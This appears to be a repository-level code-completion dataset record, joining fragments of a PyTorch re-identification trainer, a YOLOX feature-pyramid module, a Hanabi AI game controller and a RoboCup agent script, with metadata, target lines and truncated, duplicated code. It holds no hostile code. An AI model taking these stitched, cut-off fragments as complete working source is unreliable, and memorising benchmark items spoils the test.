precisions = AverageMeter()
precisions_1 = AverageMeter()
end = time.time()
for i in range(train_iters):
source_inputs = data_loader.next()
support_image, labels_support = data_loader_support.next()
support_features = torch.Tensor(self.feat_support[self.pos[labels_support]]).cuda()
data_time.update(time.time() - end)
s_inputs, targets = self._parse_data(source_inputs)
s_features, s_cls_out, s_cls_out_1 = self.model(s_inputs, targets)
ori_features, _, _ = self.model(support_image, targets)
# backward main #
loss_ce, loss_ce_1, prec, prec_1 = self._forward(s_features, s_cls_out, s_cls_out_1, targets)
ori_features = ori_features/torch.norm(ori_features, dim=1).view(ori_features.shape[0],1)
#support_features = support_features/torch.norm(support_features, dim=1).view(support_features.shape[0],1)
loss_sp = torch.mean(torch.sum((ori_features - support_features)**2, dim=1))
#loss_sp = torch.mean(torch.sum(torch.abs(ori_features - support_features), dim=1))
loss = loss_ce + loss_ce_1 + 100 * loss_sp
losses_ce.update(loss_ce.item())
losses_ce_1.update(loss_ce_1.item())
losses_sp.update(loss_sp.item())
precisions.update(prec)
precisions_1.update(prec_1)
optimizer.zero_grad()
loss.backward()
optimizer.step()
ema.update()
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % print_freq == 0):
print('Epoch: [{}][{}/{}]\t'
'LR:{:.8f}\t'
'Time {:.3f} ({:.3f})\t'
'Data {:.3f} ({:.3f})\t'
'Loss_ce {:.3f} ({:.3f})\t'
'Loss_ce_1 {:.3f} ({:.3f})\t'
'Loss_sp {:.3f} ({:.3f})\t'
'Prec {:.2%} ({:.2%}) \t'
'Prec_1 {:.2%} ({:.2%}) \t'
.format(epoch, i + 1, train_iters,optimizer.param_groups[0]["lr"],
batch_time.val, batch_time.avg,
data_time.val, data_time.avg,
losses_ce.val, losses_ce.avg,
losses_ce_1.val, losses_ce_1.avg,
losses_sp.val, losses_sp.avg,
precisions.val, precisions.avg,
precisions_1.val, precisions_1.avg))
def _parse_data(self, inputs):
imgs, _, pids, _ = inputs
inputs = imgs.cuda()
targets = pids.cuda()
return inputs, targets
def _forward(self, s_features, s_outputs, s_outputs_1, targets):
s_features = s_features.cuda()
s_outputs = s_outputs.cuda()
s_outputs_1 = s_outputs_1.cuda()
targets = targets.cuda()
loss_ce = self.criterion_ce(s_outputs, targets)
loss_ce_1 = self.criterion_ce(s_outputs_1, targets)
| from __future__ import print_function, absolute_import
class Trainer(object):
def __init__(self, model, name_feature_support, num_classes, margin=0.0):
super(Trainer, self).__init__()
self.model = model
self.name_support = np.array(name_feature_support[0])
self.pos = np.argsort(self.name_support)
self.feat_support = name_feature_support[1]
self.criterion_ce = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
self.criterion_ce_1 = CrossEntropyLabelSmooth(num_classes, epsilon=0).cuda()
#self.criterion_support = nn.MSELoss().cuda()#nn.L1Loss().cuda() #nn.MSELoss().cuda()
#self.criterion_cos_pair = CosfacePairwiseLoss(m=0.35, s=64).cuda()
#self.criterion_triple = SoftTripletLoss(margin=margin).cuda()
#self.w_ce = 10
#self.w_tri = 1
#print("The weight for loss_ce is ", self.w_ce)
#print("The weight for loss_tri is ", self.w_tri)
def train(self, epoch, data_loader, data_loader_support, optimizer, ema, train_iters=200, print_freq=1):
self.model.eval()
batch_time = AverageMeter()
data_time = AverageMeter()
losses_ce = AverageMeter()
losses_ce_1 = AverageMeter()
losses_sp = AverageMeter()
#losses_cos_pair = AverageMeter()
#losses_tr = AverageMeter()
precisions = AverageMeter()
precisions_1 = AverageMeter()
end = time.time()
for i in range(train_iters):
source_inputs = data_loader.next()
support_image, labels_support = data_loader_support.next()
support_features = torch.Tensor(self.feat_support[self.pos[labels_support]]).cuda()
data_time.update(time.time() - end)
s_inputs, targets = self._parse_data(source_inputs)
s_features, s_cls_out, s_cls_out_1 = self.model(s_inputs, targets)
ori_features, _, _ = self.model(support_image, targets)
# backward main #
loss_ce, loss_ce_1, prec, prec_1 = self._forward(s_features, s_cls_out, s_cls_out_1, targets)
ori_features = ori_features/torch.norm(ori_features, dim=1).view(ori_features.shape[0],1)
#support_features = support_features/torch.norm(support_features, dim=1).view(support_features.shape[0],1)
loss_sp = torch.mean(torch.sum((ori_features - support_features)**2, dim=1))
#loss_sp = torch.mean(torch.sum(torch.abs(ori_features - support_features), dim=1))
loss = loss_ce + loss_ce_1 + 100 * loss_sp
losses_ce.update(loss_ce.item())
losses_ce_1.update(loss_ce_1.item())
losses_sp.update(loss_sp.item())
precisions.update(prec)
precisions_1.update(prec_1)
optimizer.zero_grad()
loss.backward()
optimizer.step()
ema.update()
batch_time.update(time.time() - end)
end = time.time()
if ((i + 1) % print_freq == 0):
print('Epoch: [{}][{}/{}]\t'
'LR:{:.8f}\t'
'Time {:.3f} ({:.3f})\t'
'Data {:.3f} ({:.3f})\t'
'Loss_ce {:.3f} ({:.3f})\t'
'Loss_ce_1 {:.3f} ({:.3f})\t'
'Loss_sp {:.3f} ({:.3f})\t'
'Prec {:.2%} ({:.2%}) \t'
'Prec_1 {:.2%} ({:.2%}) \t'
.format(epoch, i + 1, train_iters,optimizer.param_groups[0]["lr"],
batch_time.val, batch_time.avg,
data_time.val, data_time.avg,
losses_ce.val, losses_ce.avg,
losses_ce_1.val, losses_ce_1.avg,
losses_sp.val, losses_sp.avg,
precisions.val, precisions.avg,
precisions_1.val, precisions_1.avg))
def _parse_data(self, inputs):
imgs, _, pids, _ = inputs
inputs = imgs.cuda()
targets = pids.cuda()
return inputs, targets
def _forward(self, s_features, s_outputs, s_outputs_1, targets):
s_features = s_features.cuda()
s_outputs = s_outputs.cuda()
s_outputs_1 = s_outputs_1.cuda()
targets = targets.cuda()
loss_ce = self.criterion_ce(s_outputs, targets)
loss_ce_1 = self.criterion_ce(s_outputs_1, targets)
| prec, = accuracy(s_outputs.data, targets.data) | 0 | 2023-12-17 11:32:48+00:00 | 4k |
alibaba/u2mot | yolox/models/yolo_pafpn.py | [
{
"identifier": "CSPDarknet",
"path": "yolox/models/darknet.py",
"snippet": "class CSPDarknet(nn.Module):\n def __init__(\n self,\n dep_mul,\n wid_mul,\n out_features=(\"dark3\", \"dark4\", \"dark5\"),\n depthwise=False,\n act=\"silu\",\n ):\n super().__init__()\n assert out_features, \"please provide output features of Darknet\"\n self.out_features = out_features\n Conv = DWConv if depthwise else BaseConv\n\n base_channels = int(wid_mul * 64) # 64\n base_depth = max(round(dep_mul * 3), 1) # 3\n\n # stem\n self.stem = Focus(3, base_channels, ksize=3, act=act)\n\n # dark2\n self.dark2 = nn.Sequential(\n Conv(base_channels, base_channels * 2, 3, 2, act=act),\n CSPLayer( # CSP Bottleneck with 3 convolutions\n base_channels * 2,\n base_channels * 2,\n n=base_depth,\n depthwise=depthwise,\n act=act,\n ),\n )\n\n # dark3\n self.dark3 = nn.Sequential(\n Conv(base_channels * 2, base_channels * 4, 3, 2, act=act),\n CSPLayer( # CSP Bottleneck with 3 convolutions\n base_channels * 4,\n base_channels * 4,\n n=base_depth * 3,\n depthwise=depthwise,\n act=act,\n ),\n )\n\n # dark4\n self.dark4 = nn.Sequential(\n Conv(base_channels * 4, base_channels * 8, 3, 2, act=act),\n CSPLayer( # CSP Bottleneck with 3 convolutions\n base_channels * 8,\n base_channels * 8,\n n=base_depth * 3,\n depthwise=depthwise,\n act=act,\n ),\n )\n\n # dark5\n self.dark5 = nn.Sequential(\n Conv(base_channels * 8, base_channels * 16, 3, 2, act=act),\n SPPBottleneck(base_channels * 16, base_channels * 16, activation=act), # SPP\n CSPLayer( # CSP Bottleneck with 3 convolutions\n base_channels * 16,\n base_channels * 16,\n n=base_depth,\n shortcut=False,\n depthwise=depthwise,\n act=act,\n ),\n )\n\n def forward(self, x):\n '''\n x --> stem --> dark2 --> dark3 --> dark4 --> dark5 --> output\n stem: Focus\n dark2: Conv --> CSPLayer\n dark3: Conv --> CSPLayer\n dark4: Conv --> CSPLayer\n dark5: Conv --> SPPBottleneck --> CSPLayer\n '''\n outputs = {}\n x = self.stem(x)\n outputs[\"stem\"] = x\n x = self.dark2(x)\n outputs[\"dark2\"] = x\n x = self.dark3(x)\n outputs[\"dark3\"] = x\n x = self.dark4(x)\n outputs[\"dark4\"] = x\n x = self.dark5(x)\n outputs[\"dark5\"] = x\n return {k: v for k, v in outputs.items() if k in self.out_features} # get feature w.r.t self.out_features"
},
{
"identifier": "BaseConv",
"path": "yolox/models/network_blocks.py",
"snippet": "class BaseConv(nn.Module):\n \"\"\"A Conv2d -> Batchnorm -> silu/leaky relu block\"\"\"\n\n def __init__(\n self, in_channels, out_channels, ksize, stride, groups=1, bias=False, act=\"silu\"\n ):\n super().__init__()\n # use same padding\n pad = (ksize - 1) // 2\n self.conv = nn.Conv2d(\n in_channels,\n out_channels,\n kernel_size=ksize,\n stride=stride,\n padding=pad,\n groups=groups,\n bias=bias,\n )\n self.bn = nn.BatchNorm2d(out_channels)\n self.act = get_activation(act, inplace=True)\n\n def forward(self, x):\n '''\n x --> Conv2d --> BN --> activation --> x\n '''\n return self.act(self.bn(self.conv(x))) # Conv ==> BN ==> activate\n\n def fuseforward(self, x):\n return self.act(self.conv(x))"
},
{
"identifier": "CSPLayer",
"path": "yolox/models/network_blocks.py",
"snippet": "class CSPLayer(nn.Module):\n \"\"\"C3 in yolov5, CSP Bottleneck with 3 convolutions\"\"\"\n\n def __init__(\n self,\n in_channels,\n out_channels,\n n=1,\n shortcut=True,\n expansion=0.5,\n depthwise=False,\n act=\"silu\",\n ):\n \"\"\"\n Args:\n in_channels (int): input channels.\n out_channels (int): output channels.\n n (int): number of Bottlenecks. Default value: 1.\n \"\"\"\n # ch_in, ch_out, number, shortcut, groups, expansion\n super().__init__()\n hidden_channels = int(out_channels * expansion) # hidden channels\n self.conv1 = BaseConv(in_channels, hidden_channels, 1, stride=1, act=act)\n self.conv2 = BaseConv(in_channels, hidden_channels, 1, stride=1, act=act)\n self.conv3 = BaseConv(2 * hidden_channels, out_channels, 1, stride=1, act=act)\n module_list = [\n Bottleneck(\n hidden_channels, hidden_channels, shortcut, 1.0, depthwise, act=act\n )\n for _ in range(n)\n ]\n self.m = nn.Sequential(*module_list)\n\n def forward(self, x):\n '''\n | BaseConv --> Bottleneck * n \\\n x --> cat --> BaseConv\n \\ BaseConv |\n '''\n x_1 = self.conv1(x)\n x_2 = self.conv2(x)\n x_1 = self.m(x_1)\n x = torch.cat((x_1, x_2), dim=1)\n return self.conv3(x)"
},
{
"identifier": "DWConv",
"path": "yolox/models/network_blocks.py",
"snippet": "class DWConv(nn.Module):\n \"\"\"Depthwise Conv (with BN and activation) + Pointwise Conv (with BN and activation)\"\"\"\n\n def __init__(self, in_channels, out_channels, ksize, stride=1, act=\"silu\"):\n super().__init__()\n self.dconv = BaseConv(\n in_channels,\n in_channels,\n ksize=ksize,\n stride=stride,\n groups=in_channels, # depthwise\n act=act,\n )\n self.pconv = BaseConv(\n in_channels, out_channels, ksize=1, stride=1, groups=1, act=act\n )\n\n def forward(self, x):\n '''\n x --> dconv (e.g. depthwise conv --> BN --> act) --> pconv (e.g. pointwise conv --> BN --> act) --> x\n '''\n x = self.dconv(x)\n return self.pconv(x)"
}
] | import torch
import torch.nn as nn
from .darknet import CSPDarknet
from .network_blocks import BaseConv, CSPLayer, DWConv | 1,948 | #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOPAFPN(nn.Module):
"""
YOLOv3 model. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=1.0,
width=1.0,
in_features=("dark3", "dark4", "dark5"),
in_channels=[256, 512, 1024],
depthwise=False,
act="silu",
):
super().__init__()
| #!/usr/bin/env python3
# -*- encoding:utf-8 -*-
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
# Copyright (c) Alibaba, Inc. and its affiliates.
class YOLOPAFPN(nn.Module):
"""
YOLOv3 model. Darknet 53 is the default backbone of this model.
"""
def __init__(
self,
depth=1.0,
width=1.0,
in_features=("dark3", "dark4", "dark5"),
in_channels=[256, 512, 1024],
depthwise=False,
act="silu",
):
super().__init__() | self.backbone = CSPDarknet(depth, width, depthwise=depthwise, act=act) | 0 | 2023-12-18 10:04:40+00:00 | 4k |
UnbSky/Hanabi-AI-Assitant | game_controller.py | [
{
"identifier": "load_model",
"path": "play_util.py",
"snippet": "def load_model(model_name=None):\n #device = 'cuda' if torch.cuda.is_available() else 'cpu' # examples: 'cpu', 'cuda', 'cuda:0', 'cuda:1', etc.\n device = 'cpu'\n\n acition_dict_toid = {}\n if model_name is None:\n dict_path = 'dict.json'\n else:\n dict_path = f'{model_name}/dict.json'\n with open(dict_path, 'r', encoding='utf-8') as file:\n acition_dict = json.load(file)\n acition_dict = [\"<pad>\"] + acition_dict\n ind = 0\n for action in acition_dict:\n acition_dict_toid[action] = ind\n #print(action, ind)\n ind += 1\n n_vacabs = len(acition_dict)\n output_acition_dict_toid = {}\n if model_name is None:\n output_dict_path = 'output_dict.json'\n else:\n output_dict_path = f'{model_name}/output_dict.json'\n with open(output_dict_path, 'r', encoding='utf-8') as file:\n output_acition_dict = json.load(file)\n output_acition_dict = [\"<pad>\"] + output_acition_dict\n ind = 0\n for action in output_acition_dict:\n output_acition_dict_toid[action] = ind\n #print(action, ind)\n ind += 1\n n_vacabs_out = len(output_acition_dict)\n\n if model_name is None:\n max_seq_len = 900\n dim = 384\n n_layers = 8\n n_heads = 8\n multiple_of = 32\n dropout = 0.0\n model_args = dict(\n dim=dim,\n n_layers=n_layers,\n n_heads=n_heads,\n n_kv_heads=n_heads,\n vocab_size=n_vacabs,\n output_vocab_size=n_vacabs_out,\n multiple_of=multiple_of,\n max_seq_len=max_seq_len,\n dropout=dropout,\n ) # s\n else:\n with open(f'{model_name}/config.json', 'r') as json_file:\n model_args = json.load(json_file)\n\n seed = 1337\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n torch.backends.cuda.matmul.allow_tf32 = True # allow tf32 on matmul\n torch.backends.cudnn.allow_tf32 = True # allow tf32 on cudnn\n\n # init from a model saved in a specific directory\n if model_name is None:\n ckpt_path = 'best_valid.pth'\n else:\n ckpt_path = f'{model_name}/model.pth'\n state_dict = torch.load(ckpt_path, map_location=device)\n gptconf = ModelArgs(**model_args)\n model = Transformer(gptconf)\n unwanted_prefix = '_orig_mod.'\n for k, v in list(state_dict.items()):\n if k.startswith(unwanted_prefix):\n state_dict[k[len(unwanted_prefix):]] = state_dict.pop(k)\n model.load_state_dict(state_dict, strict=False)\n model.eval()\n model.to(device)\n return model, acition_dict, acition_dict_toid, output_acition_dict, output_acition_dict_toid, device"
},
{
"identifier": "generate_answer",
"path": "play_util.py",
"snippet": "def generate_answer(model, input_actions, acition_dict_toid, device, topk):\n input_id = []\n for action in input_actions:\n if len(action) < 1:\n continue\n if any(char.isalpha() for char in action):\n action = action.replace(\"light-myself\",\"light_myself\")\n action = action.strip()\n if action not in acition_dict_toid:\n print(f\"NULL[{action}]\")\n return f\"NULL[{action}]\"\n input_id.append(acition_dict_toid[action])\n #print(input_id)\n input_id = np.array([input_id])\n input_id = torch.from_numpy(input_id)\n input_id = input_id.to(device)\n idx, probs = model.play_topk(input_id, topk)\n return idx, probs"
}
] | from play_util import load_model, generate_answer
from dataclasses import dataclass
import random
import logging | 3,552 | # 游戏初始情况
if "6 Suits" in self.variant_name:
# 6张牌
self.Irank = [0, 0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5, 5]
index_amount = 6
self.special_dict.last_special_card = 5
self.total_card = 60
else:
# 5张牌
self.Irank = [0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5]
index_amount = 5
self.special_dict.last_special_card = 4
self.total_card = 50
for vstr in variant_one_card:
if vstr in self.variant_name:
self.last_one_card = True
self.total_card -= 5
break
for vstr in no_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_color_rule = True
break
for vstr in all_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_color_rule = True
break
for vstr in no_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_rank_rule = True
break
for vstr in all_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_rank_rule = True
break
for pid in range(self.players_count):
self.players.append(GamePlayer(pid, self))
def set_current_history(self, index):
history_dict = self.game_history[index]
self.Irank = history_dict["Irank"]
self.Hrank = history_dict["Hrank"]
self.score = sum(self.Irank)
for i in range(self.players_count):
self.players[i].cards = history_dict["cards"][i]
self.players[i].known_cards = history_dict["kcards"][i]
self.clue = history_dict["clue"]
self.active_pid = history_dict["active_pid"]
action_token = history_dict["action_token"]
action = self.get_action(action_token, self.active_pid)
return action
def get_current_card(self):
current_card = self.total_card - self.score - len(self.discard_cards) - self.players_count * self.players_card_count
if current_card <= 0:
return 0
return current_card
def add_card_deck(self, card):
self.all_cards.append(card)
def __init__(self, model_data=None):
if model_data is None:
self.model, self.action_dict_toact, self.action_dict_toid, self.output_action_dict_toact, self.output_action_dict_toid, self.device = load_model()
else:
self.model = model_data[0]
self.action_dict_toact = model_data[1]
self.action_dict_toid = model_data[2]
self.output_action_dict_toact = model_data[3]
self.output_action_dict_toid = model_data[4]
self.device = model_data[5]
def parse_card(self, card):
if card[1] == "_":
index = 9
else:
index = int(card[1])
if card[3] == "_":
rank = 9
else:
rank = int(card[3])
return index, rank
def update_AI_token(self, active_pid):
# 补充所有的玩家目前的手牌情况
light_cards = [[] for _ in range(self.players_count)]
# for iindex in range(len(self.Irank)):
# irank_str = f"irank-I{iindex}R{self.Irank[iindex]}"
# #print(irank_str)
# self.AItokens[active_pid].append(irank_str)
# self.AItokens[active_pid].append(f"score-{self.score}")
for pid in range(self.players_count):
rpid = pid - active_pid
if rpid < 0:
rpid += self.players_count
player = self.players[pid]
if rpid == 0:
light_cards[rpid] = player.get_light_card_myself()
else:
light_cards[rpid] = player.get_light_card(rpid)
for i in range(len(light_cards) - 1, -1, -1):
self.AItokens[active_pid].extend(light_cards[i])
self.AImasks[active_pid].extend([0] * len(light_cards[i]))
# 给AI们更新游戏状态token
self.AItokens[active_pid].append(self.op_token)
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"myturn-{self.AIturn[active_pid]}")
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"clues-{self.clue}")
self.AImasks[active_pid].append(0)
def call_AI_predict(self, active_pid, topk):
# AI行动(更新token)
self.update_AI_token(active_pid)
|
def get_logger(filename, verbosity=1, name=None):
level_dict = {0: logging.DEBUG, 1: logging.INFO, 2: logging.WARNING}
formatter = logging.Formatter(
"[%(asctime)s][%(filename)s][%(levelname)s] %(message)s"
)
logger = logging.getLogger(name)
logger.setLevel(level_dict[verbosity])
fh = logging.FileHandler(filename, "w")
fh.setFormatter(formatter)
logger.addHandler(fh)
# sh = logging.StreamHandler()
# sh.setFormatter(formatter)
# logger.addHandler(sh)
return logger
logger = get_logger('gameplay_log.log')
@dataclass
class GameArgs:
players: int = 2
players_card: int = 5
AIplayer: list = None
variant: str = "No Variant"
random_start: bool = True
start_card: list = None
allow_drawback: bool = False
@dataclass
class SpecialGameArgs:
no_color_rule: bool = False
all_color_rule: bool = False
no_rank_rule: bool = False
all_rank_rule: bool = False
last_special_card: int = 4
def try_start_game(gameargs: GameArgs):
return GameController(gameargs)
class GamePlayer():
def __init__(self, pid, game_controller):
self.cards = []
self.known_cards = []
self.online_order = []
self.pid = pid
self.game_controller = game_controller
def gain_card(self, card, order=None):
self.cards.append(card)
self.online_order.append(order)
self.known_cards.append("I_R_")
def get_light_card(self, rpid):
light_tokens = []
for i in range(len(self.cards)):
lcard = self.cards[i]
kcard = self.known_cards[i]
token = f"light-PR{rpid}-{lcard}-{kcard}"
light_tokens.append(token)
return light_tokens
def get_light_card_myself(self):
light_tokens = []
for i in range(len(self.cards)):
kcard = self.known_cards[i]
token = f"light_myself-{kcard}"
light_tokens.append(token)
return light_tokens
def get_card_at(self, index):
return self.cards[index], self.known_cards[index]
def remove_card_at(self, index):
self.cards.pop(index)
self.known_cards.pop(index)
self.online_order.pop(index)
def get_clue(self, clue, clue_type, clue_value):
# clue的格式是一个 I_ 或者 R_
for card_ind in range(len(self.cards)):
# print(clue_info, target_card[card_ind], (clue_info in target_card[card_ind]))
if clue in self.cards[card_ind]:
kcard = self.known_cards[card_ind]
if clue_type == 0:
self.known_cards[card_ind] = kcard[:1] + f"{clue_value}" + kcard[2:]
elif clue_type == 1:
self.known_cards[card_ind] = kcard[:3] + f"{clue_value}" + kcard[4:]
# I_R_ 表示牌,当表示自己的牌是未知的时候使用 IURU
class GameController():
def start_game(self, gameargs: GameArgs):
# if not gameargs.random_start:
# if gameargs.start_card is None:
# print("ERROR: 没有设置开始牌型")
# elif len(gameargs.start_card) != gameargs.players * gameargs.players_card:
# print("ERROR: 并非所有玩家都有初始牌型")
# elif gameargs.allow_drawback:
# print("ERROR: 非随机对局不允许撤回AI的操作")
# self.online_card_order = []
self.game_history = []
self.players_count = gameargs.players
self.players_card_count = gameargs.players_card
self.players = []
self.AIplayes = gameargs.AIplayer
self.AItokens = [[] for _ in range(self.players_count)]
self.AImasks = [[] for _ in range(self.players_count)]
self.AIturn = [1 for _ in range(self.players_count)]
self.draw_check_value = random.randint(2, 7)
# 目前默认所有玩法都是普通玩法
self.allow_drawback = gameargs.allow_drawback
# 是否是一把随机发牌的游戏(这说明只存在AI,并且整个游戏是完全自动的)
self.ramdom_start = gameargs.random_start
# 所有牌,发牌按照该顺序发牌
self.all_cards = []
self.discard_cards = []
# 目前发到的牌的index
self.current_card_index = 0
self.game_actions = []
self.action_list_cache = None
self.op_token = f"OP-{gameargs.variant}-P{self.players_count}"
self.turn = 0
self.clue = 8
self.score = 0
self.mistake = 0
self.active_pid = 0
# Irank是目前的花色的情况
self.remain_round = self.players_count
variant_one_card = ["Dark Null", "Dark Brown", "Cocoa Rainbow", "Gray", "Black", "Dark Rainbow", "Gray Pink",
"Dark Pink", "Dark Omni"]
no_color_rule_variant = ["Null", "White", "Light Pink", "Dark Null", "Gray", "Gray Pink"]
all_color_rule_variant = ["Muddy Rainbow", "Rainbow", "Omni", "Cocoa Rainbow", "Dark Rainbow", "Dark Omni"]
no_rank_rule_variant = ["Null", "Brown", "Muddy Rainbow", "Dark Null", "Dark Brown", "Cocoa Rainbow"]
all_rank_rule_variant = ["Light Pink", "Pink", "Omni", "Gray Pink", "Dark Pink", "Dark Omni"]
self.variant_name = gameargs.variant
self.last_one_card = False
self.special_dict = SpecialGameArgs()
# 游戏初始情况
if "6 Suits" in self.variant_name:
# 6张牌
self.Irank = [0, 0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5, 5]
index_amount = 6
self.special_dict.last_special_card = 5
self.total_card = 60
else:
# 5张牌
self.Irank = [0, 0, 0, 0, 0]
self.Hrank = [5, 5, 5, 5, 5]
index_amount = 5
self.special_dict.last_special_card = 4
self.total_card = 50
for vstr in variant_one_card:
if vstr in self.variant_name:
self.last_one_card = True
self.total_card -= 5
break
for vstr in no_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_color_rule = True
break
for vstr in all_color_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_color_rule = True
break
for vstr in no_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.no_rank_rule = True
break
for vstr in all_rank_rule_variant:
if vstr in self.variant_name:
self.special_dict.all_rank_rule = True
break
for pid in range(self.players_count):
self.players.append(GamePlayer(pid, self))
def set_current_history(self, index):
history_dict = self.game_history[index]
self.Irank = history_dict["Irank"]
self.Hrank = history_dict["Hrank"]
self.score = sum(self.Irank)
for i in range(self.players_count):
self.players[i].cards = history_dict["cards"][i]
self.players[i].known_cards = history_dict["kcards"][i]
self.clue = history_dict["clue"]
self.active_pid = history_dict["active_pid"]
action_token = history_dict["action_token"]
action = self.get_action(action_token, self.active_pid)
return action
def get_current_card(self):
current_card = self.total_card - self.score - len(self.discard_cards) - self.players_count * self.players_card_count
if current_card <= 0:
return 0
return current_card
def add_card_deck(self, card):
self.all_cards.append(card)
def __init__(self, model_data=None):
if model_data is None:
self.model, self.action_dict_toact, self.action_dict_toid, self.output_action_dict_toact, self.output_action_dict_toid, self.device = load_model()
else:
self.model = model_data[0]
self.action_dict_toact = model_data[1]
self.action_dict_toid = model_data[2]
self.output_action_dict_toact = model_data[3]
self.output_action_dict_toid = model_data[4]
self.device = model_data[5]
def parse_card(self, card):
if card[1] == "_":
index = 9
else:
index = int(card[1])
if card[3] == "_":
rank = 9
else:
rank = int(card[3])
return index, rank
def update_AI_token(self, active_pid):
# 补充所有的玩家目前的手牌情况
light_cards = [[] for _ in range(self.players_count)]
# for iindex in range(len(self.Irank)):
# irank_str = f"irank-I{iindex}R{self.Irank[iindex]}"
# #print(irank_str)
# self.AItokens[active_pid].append(irank_str)
# self.AItokens[active_pid].append(f"score-{self.score}")
for pid in range(self.players_count):
rpid = pid - active_pid
if rpid < 0:
rpid += self.players_count
player = self.players[pid]
if rpid == 0:
light_cards[rpid] = player.get_light_card_myself()
else:
light_cards[rpid] = player.get_light_card(rpid)
for i in range(len(light_cards) - 1, -1, -1):
self.AItokens[active_pid].extend(light_cards[i])
self.AImasks[active_pid].extend([0] * len(light_cards[i]))
# 给AI们更新游戏状态token
self.AItokens[active_pid].append(self.op_token)
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"myturn-{self.AIturn[active_pid]}")
self.AImasks[active_pid].append(0)
self.AItokens[active_pid].append(f"clues-{self.clue}")
self.AImasks[active_pid].append(0)
def call_AI_predict(self, active_pid, topk):
# AI行动(更新token)
self.update_AI_token(active_pid) | action_ids, action_probs = generate_answer(self.model, self.AItokens[active_pid], self.action_dict_toid, self.device, topk) | 1 | 2023-12-17 03:57:47+00:00 | 4k |
m-abr/FCPCodebase | scripts/utils/Get_Up.py | [
{
"identifier": "Base_Agent",
"path": "agent/Base_Agent.py",
"snippet": "class Base_Agent():\n all_agents = []\n\n def __init__(self, host:str, agent_port:int, monitor_port:int, unum:int, robot_type:int, team_name:str, enable_log:bool=True,\n enable_draw:bool=True, apply_play_mode_correction:bool=True, wait_for_server:bool=True, hear_callback=None) -> None:\n\n self.radio = None # hear_message may be called during Server_Comm instantiation\n self.logger = Logger(enable_log, f\"{team_name}_{unum}\")\n self.world = World(robot_type, team_name, unum, apply_play_mode_correction, enable_draw, self.logger, host)\n self.world_parser = World_Parser(self.world, self.hear_message if hear_callback is None else hear_callback)\n self.scom = Server_Comm(host,agent_port,monitor_port,unum,robot_type,team_name,self.world_parser,self.world,Base_Agent.all_agents,wait_for_server)\n self.inv_kinematics = Inverse_Kinematics(self.world.robot)\n self.behavior = Behavior(self)\n self.path_manager = Path_Manager(self.world)\n self.radio = Radio(self.world, self.scom.commit_announcement)\n self.behavior.create_behaviors()\n Base_Agent.all_agents.append(self)\n\n @abstractmethod\n def think_and_send(self):\n pass\n\n def hear_message(self, msg:bytearray, direction, timestamp:float) -> None:\n if direction != \"self\" and self.radio is not None:\n self.radio.receive(msg)\n\n def terminate(self):\n # close shared monitor socket if this is the last agent on this thread\n self.scom.close(close_monitor_socket=(len(Base_Agent.all_agents)==1))\n Base_Agent.all_agents.remove(self)\n\n @staticmethod\n def terminate_all():\n for o in Base_Agent.all_agents:\n o.scom.close(True) # close shared monitor socket, if it exists\n Base_Agent.all_agents = []"
},
{
"identifier": "Script",
"path": "scripts/commons/Script.py",
"snippet": "class Script():\n ROOT_DIR = path.dirname(path.dirname(realpath( join(getcwd(), dirname(__file__))) )) # project root directory\n\n def __init__(self, cpp_builder_unum=0) -> None:\n\n '''\n Arguments specification\n -----------------------\n - To add new arguments, edit the information below\n - After changing information below, the config.json file must be manually deleted\n - In other modules, these arguments can be accessed by their 1-letter ID\n '''\n # list of arguments: 1-letter ID, Description, Hardcoded default\n self.options = {'i': ('Server Hostname/IP', 'localhost'),\n 'p': ('Agent Port', '3100'),\n 'm': ('Monitor Port', '3200'),\n 't': ('Team Name', 'FCPortugal'),\n 'u': ('Uniform Number', '1'),\n 'r': ('Robot Type', '1'),\n 'P': ('Penalty Shootout', '0'),\n 'F': ('magmaFatProxy', '0'),\n 'D': ('Debug Mode', '1')}\n\n # list of arguments: 1-letter ID, data type, choices \n self.op_types = {'i': (str, None),\n 'p': (int, None),\n 'm': (int, None),\n 't': (str, None),\n 'u': (int, range(1,12)),\n 'r': (int, [0,1,2,3,4]),\n 'P': (int, [0,1]),\n 'F': (int, [0,1]),\n 'D': (int, [0,1])}\n \n '''\n End of arguments specification\n '''\n\n self.read_or_create_config()\n\n #advance help text position\n formatter = lambda prog: argparse.HelpFormatter(prog,max_help_position=52)\n parser = argparse.ArgumentParser(formatter_class=formatter)\n\n o = self.options\n t = self.op_types\n\n for id in self.options: # shorter metavar for aesthetic reasons\n parser.add_argument(f\"-{id}\", help=f\"{o[id][0]:30}[{o[id][1]:20}]\", type=t[id][0], nargs='?', default=o[id][1], metavar='X', choices=t[id][1])\n \n self.args = parser.parse_args()\n\n if getattr(sys, 'frozen', False): # disable debug mode when running from binary\n self.args.D = 0\n\n self.players = [] # list of created players\n\n Script.build_cpp_modules(exit_on_build = (cpp_builder_unum != 0 and cpp_builder_unum != self.args.u))\n\n if self.args.D:\n try:\n print(f\"\\nNOTE: for help run \\\"python {__main__.__file__} -h\\\"\")\n except:\n pass\n\n columns = [[],[],[]]\n for key, value in vars(self.args).items():\n columns[0].append(o[key][0])\n columns[1].append(o[key][1])\n columns[2].append(value)\n\n UI.print_table(columns, [\"Argument\",\"Default at /config.json\",\"Active\"], alignment=[\"<\",\"^\",\"^\"])\n\n\n def read_or_create_config(self) -> None:\n\n if not path.isfile('config.json'): # save hardcoded default values if file does not exist\n with open(\"config.json\", 